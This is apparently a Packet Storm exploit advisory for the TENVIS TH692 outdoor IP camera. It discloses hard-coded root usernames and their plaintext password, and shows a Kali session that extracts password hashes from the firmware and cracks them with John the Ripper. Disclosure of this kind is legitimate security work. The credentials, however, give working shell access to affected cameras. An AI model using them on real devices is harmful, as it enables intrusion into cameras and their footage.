TH692 Outdoor P2P HD Waterproof IP Camera Hard-Coded Credentials

🗓️ 18 Apr 2016 00:00:00Reported by DLYType

packetstorm🔗 packetstormsecurity.com👁 37 Views

TH692 Outdoor P2P HD Waterproof IP Camera Hard-Coded Credentials Exploi

`Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials  
Date: 4/16/2016  
Exploit Author: DLY  
Vendor: TENVIS Technology Co., Ltd  
Product: TH692- Outdoor P2P HD Waterproof IP Camera  
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html  
Affected version: TH692C-V. 16.1.16.1.1.4  
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov  
  
user: Mroot  
pass:cat1029  
user:Wproot  
pass: cat1029  
  
root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root  
rootpath  
rootfs crc %lx  
------------------start upgrade rootfs------------------  
------------------end upgrade rootfs------------------  
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)  
nfsroot  
7root  
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot  
k01000100 rootbox nohelp info  
root::0:  
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh  
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh  
nfsroot  
pivot_root  
xswitch_root  
chroot  
nfsroot  
root@kali:~# john --show ipcamhashes  
Mroot:cat1029:0:0::/root:/bin/sh  
Wproot:cat1029:0:0::/root:/bin/sh  
  
2 password hashes cracked, 0 left  
  
  
`

18 Apr 2016 00:00Current

0.2Low risk

Vulners AI Score0.2

tenvis technology co.waterproof ip camera hard-coded credentials firmware version 16.1.16.1.1.4 security vulnerability usernames and passwords exploit date 4/16/2016 vendor: tenvis technology co.product webpage ip camera footage security